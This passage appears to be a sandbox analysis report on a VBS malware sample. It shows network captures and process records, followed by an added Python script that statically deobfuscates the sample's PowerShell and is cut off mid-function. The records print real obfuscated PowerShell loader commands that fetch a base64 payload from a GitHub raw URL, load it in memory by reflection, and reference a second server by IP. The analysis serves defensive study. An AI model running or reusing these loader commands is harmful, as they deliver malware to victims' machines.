                        Oct 2, 2024 05:23:18.439258099 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.439271927 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.439716101 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.439740896 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.439790964 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.439796925 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.439878941 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.483222008 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.530417919 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.530442953 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.530607939 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.530618906 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.530670881 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.530824900 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.530850887 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.530921936 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.530921936 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.530929089 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.530968904 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.531591892 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.531608105 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.531712055 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.531717062 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.531800985 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.532665968 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.532684088 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.532804966 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.532809973 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.532892942 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.533111095 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533128977 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533226967 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.533231974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533293009 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.533504963 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533520937 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533651114 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.533654928 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533724070 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.533849955 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533868074 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533942938 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.533946991 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.533958912 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.534019947 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.534318924 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.534333944 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.534415960 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.534421921 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.534548044 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.625055075 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.625081062 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:18.625225067 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:18.625241995 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476290941 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476361990 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.476366043 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476423025 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.476423025 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478236914 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478266954 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478339911 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478339911 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478344917 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478396893 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478570938 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478590965 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478663921 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478667974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478749037 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478749037 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478844881 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478863955 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478944063 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478949070 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479007006 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.479233980 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479253054 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479314089 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.479317904 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479372978 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.479599953 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479619980 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479756117 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.479759932 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479835987 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.480036974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.480056047 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.480129004 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.480133057 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.480149984 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.480215073 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.570595026 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.570621014 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.570947886 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.570985079 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.571058989 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.571058989 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.571058989 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.571078062 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.572807074 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.572830915 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573024988 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573024988 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573031902 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573237896 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573261023 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573528051 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573533058 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573575974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573594093 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573702097 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573702097 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573707104 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574119091 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574156046 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574230909 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574230909 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574237108 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574429035 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574445963 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574541092 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574541092 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574546099 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574695110 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574728012 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574786901 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574786901 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574791908 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.624002934 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.665009975 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665035963 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665334940 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665369034 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665416956 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.665416956 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.665431976 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665973902 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.667783022 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.667798996 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.667882919 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.667890072 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668220997 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668240070 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668348074 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.668353081 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668390036 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.668973923 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668988943 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669056892 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669061899 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669457912 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669476032 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669553995 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669553995 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669559956 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669576883 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669718981 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669733047 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669811010 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669816017 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669998884 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.670017004 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.670100927 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.670106888 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.717924118 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.759531021 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759563923 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759833097 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.759845972 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759876966 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759896994 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759912014 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.759917974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759968042 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.760005951 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.761723995 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.761744022 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.761821032 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.761830091 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.761909962 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762013912 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762031078 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762089968 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762094975 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762161970 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762161970 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762352943 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762372017 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762484074 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762492895 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762552023 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762566090 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762578964 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762641907 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762641907 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762651920 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762726068 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.765737057 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.840462923 CEST4971180192.168.2.12107.172.130.147
                        Oct 2, 2024 05:23:19.845297098 CEST8049711107.172.130.147192.168.2.12
                        Oct 2, 2024 05:23:19.845396996 CEST4971180192.168.2.12107.172.130.147
                        Oct 2, 2024 05:23:19.845839024 CEST4971180192.168.2.12107.172.130.147
                        Oct 2, 2024 05:23:19.851691008 CEST8049711107.172.130.147192.168.2.12
                        Oct 2, 2024 05:23:20.337328911 CEST8049711107.172.130.147192.168.2.12
                        Oct 2, 2024 05:23:20.389466047 CEST4971180192.168.2.12107.172.130.147
                        Oct 2, 2024 05:23:20.506352901 CEST4971180192.168.2.12107.172.130.147
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 2, 2024 05:23:16.842870951 CEST | 63691 | 53 | 192.168.2.12 | 1.1.1.1
                        Oct 2, 2024 05:23:16.849626064 CEST | 53 | 63691 | 1.1.1.1 | 192.168.2.12

                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Oct 2, 2024 05:23:16.842870951 CEST | 192.168.2.12 | 1.1.1.1 | 0xa1bf | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Oct 2, 2024 05:23:16.849626064 CEST | 1.1.1.1 | 192.168.2.12 | 0xa1bf | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                        Oct 2, 2024 05:23:16.849626064 CEST | 1.1.1.1 | 192.168.2.12 | 0xa1bf | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                        Oct 2, 2024 05:23:16.849626064 CEST | 1.1.1.1 | 192.168.2.12 | 0xa1bf | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                        Oct 2, 2024 05:23:16.849626064 CEST | 1.1.1.1 | 192.168.2.12 | 0xa1bf | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                        • raw.githubusercontent.com
                        • 107.172.130.147
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.12 | 49711 | 107.172.130.147 | 80 | 5048 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Timestamp | Bytes transferred | Direction | Data
                        Oct 2, 2024 05:23:19.845839024 CEST | 78 | OUT | GET /500/RSSTT.txt HTTP/1.1
                        Host: 107.172.130.147
                        Connection: Keep-Alive
                        Oct 2, 2024 05:23:20.337328911 CEST | 542 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 02 Oct 2024 03:23:20 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                        Content-Length: 301
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=iso-8859-1
                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 107.172.130.147 Port 80</address></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.12 | 49710 | 185.199.111.133 | 443 | 5048 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Timestamp | Bytes transferred | Direction | Data
                        2024-10-02 03:23:17 UTC | 128 | OUT | GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        2024-10-02 03:23:17 UTC | 904 | IN | HTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 2935468
                        Cache-Control: max-age=300
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Content-Type: text/plain; charset=utf-8
                        ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        X-GitHub-Request-Id: 9D15:3A4BF6:1706DDC:18C7EAB:66FCBC5F
                        Accept-Ranges: bytes
                        Date: Wed, 02 Oct 2024 03:23:17 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-ewr-kewr1740020-EWR
                        X-Cache: HIT
                        X-Cache-Hits: 0
                        X-Timer: S1727839397.433730,VS0,VE2
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: 560b052874acdd7483dfda1b724b84bbf41196b2
                        Expires: Wed, 02 Oct 2024 03:28:17 GMT
                        Source-Age: 70

                        Target ID:0
                        Start time:23:23:13
                        Start date:01/10/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs"
                        Imagebase:0x7ff74cb20000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:23:23:14
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Imagebase:0x7ff63c0a0000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:23:23:14
                        Start date:01/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff704000000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:23:23:15
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
                        Imagebase:0x7ff63c0a0000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true
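Deobfuscating the Target ID 4 command line statically. The Python script below is an added example and is not part of the Joe Sandbox report, the sample, or the dnlib project; it replays the transformations the command asks PowerShell to perform at runtime (the ('a'+'b'+...) concatenation, the three .Replace() calls, and the character indexing into $env:ComSpec that spells the cmdlet name) on the text only, so nothing is executed and neither host is contacted. The report does not record %ComSpec%, so the Windows default C:\Windows\system32\cmd.exe is assumed; the function and variable names are the example's own.

```python
"""Static deobfuscation of the Target ID 4 powershell.exe command line.

Nothing here runs PowerShell or touches the network: the transformations
the command asks PowerShell to perform at runtime (string concatenation,
three .Replace() calls, and indexing into $env:ComSpec to spell a cmdlet
name) are replayed on the text so the final script and its IOCs can be read.
"""
import re

# -command argument of Target ID 4, copied from the report; the surrounding
# double quotes of the command line are omitted.
OBFUSCATED = (
    "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'"
    "+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'"
    "+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'"
    "+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'"
    "+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'"
    "+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'"
    "+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['"
    "+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'"
    "+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'"
    "+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'"
    "+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),"
    "[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
)

# The report does not record %ComSpec%; the Windows default is assumed here.
ASSUMED_COMSPEC = r"C:\Windows\system32\cmd.exe"

# '...' literals and [char]N casts are the only value-carrying tokens used.
_TOKEN = re.compile(r"'([^']*)'|\[char\](\d+)", re.I)
_URL = re.compile(r'''https?://[^\s'"]+''')


def eval_string_expr(expr):
    """Evaluate an expression made of '...' literals and [char]N joined by '+'.
    [string] casts and parentheses do not change the value and are ignored."""
    parts = []
    for m in _TOKEN.finditer(expr):
        parts.append(chr(int(m.group(2))) if m.group(2) is not None else m.group(1))
    return "".join(parts)


def match_paren(text, start):
    """Return the index of the ')' matching the '(' at text[start], skipping quoted text."""
    depth, in_quote = 0, False
    for i in range(start, len(text)):
        ch = text[i]
        if ch == "'":
            in_quote = not in_quote
        elif not in_quote:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
                if depth == 0:
                    return i
    raise ValueError("unbalanced parentheses")


def split_args(arglist):
    """Split an argument list on commas that are outside parentheses and quotes."""
    args, cur, depth, in_quote = [], [], 0, False
    for ch in arglist:
        if ch == "'":
            in_quote = not in_quote
        elif not in_quote:
            depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0 and not in_quote:
            args.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    args.append("".join(cur))
    return args


def deobfuscate(cmd, comspec=ASSUMED_COMSPEC):
    """Replay the obfuscation pipeline and pull IOCs out of the result."""
    # 1. the parenthesised ('a'+'b'+...) concatenation that builds the script text
    start = cmd.index("(")
    end = match_paren(cmd, start)
    script = eval_string_expr(cmd[start + 1:end])

    # 2. chained .Replace(old, new) calls, applied in order (String.Replace is case-sensitive)
    pos = end
    for m in re.finditer(r"\.replace\(", cmd, re.I):
        if m.start() < pos:
            continue
        close = match_paren(cmd, m.end() - 1)
        old, new = [eval_string_expr(a) for a in split_args(cmd[m.end():close])]
        script = script.replace(old, new)
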